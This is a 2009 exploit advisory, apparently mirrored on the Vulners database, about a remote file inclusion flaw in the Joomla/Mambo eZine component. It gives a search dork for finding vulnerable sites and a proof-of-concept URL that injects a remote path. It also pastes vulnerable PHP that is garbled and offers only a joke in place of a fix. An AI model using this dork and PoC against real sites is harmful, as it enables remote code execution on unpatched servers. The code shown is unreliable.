Vulners
Lucene search
Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion
#####################################################################################################
## Joomla / Mambo Component com_ezine Remote File Include vulnerability ##
## Author : kaMtiEz ([email protected]) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : October 20 2009 ##
#####################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#####################################################################################################
[ Software Information ]
[+] Vendor : http://designformamb0.c0m
[+] Download : -
[+] version : 2.1
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_ezine"
[+] Location : INDONESIA
[DESCRIPTION]
/**
* eZine component v2.1
*
* @copyright Nguyen Manh Cuong
* Author`s email : [email protected]
* Author`s hompage : http://designformamb0.c0m
*
* @license Commercial Product - Single Site License or Free to Use with Limitation
**/
###############################################
[ PoC ]
http://server/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]
[ Bugs File ]
[+] d4m_ajax_pagenav.php
total / $this->limit );
$this_page = ceil( ($this->limitstart+1) / $this->limit );
$start_loop = (floor(($this_page-1)/$displayed_pages))*$displayed_pages+1;
if ($start_loop + $displayed_pages - 1 1) {
$page = ($this_page - 2) * $this->limit;
$txt .= '<< '. _PN_START .' ';
$txt .= '< '. _PN_PREVIOUS .' ';
} else {
$txt .= '<< '. _PN_START .' ';
$txt .= '< '. _PN_PREVIOUS .' ';
}
for ($i=$start_loop; $i limit;
if ($i == $this_page) {
$txt .= ''. $i .' ';
} else {
$txt .= ''. $i .' ';
}
}
if ($this_page limit;
$end_page = ($total_pages-1) * $this->limit;
$txt .= ''. _PN_NEXT .' > ';
$txt .= ''. _PN_END .' >>';
} else {
$txt .= ''. _PN_NEXT .' > ';
$txt .= ''. _PN_END .' >>';
}
return $txt;
}
}
?>
[ FIX ]
Tukulesto said : talk to Aurakasih .. lol
kaMtiEz said : tanya ama AuraKasih .. hha
M3Nw5 said : takon Karo AuraKasih .. hha
Arianom Said : coba kau tanya aura kasih lae
Joke.. ;)
###############################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!
[ NOTE ]
[+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh
[+] makasih buat om tukulesto buat perl exploit nye .. huahhh
[+] aurakasih .. sekarang pilih antara kaMtiEz . Tukulesto . M3NW5 ... hha
[+] om tukulesto kutunggu kau di kotaku .. :D -----------------------------------------------------------------] Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Oct 2009 00:00Current
7.4High risk
Vulners AI Score7.4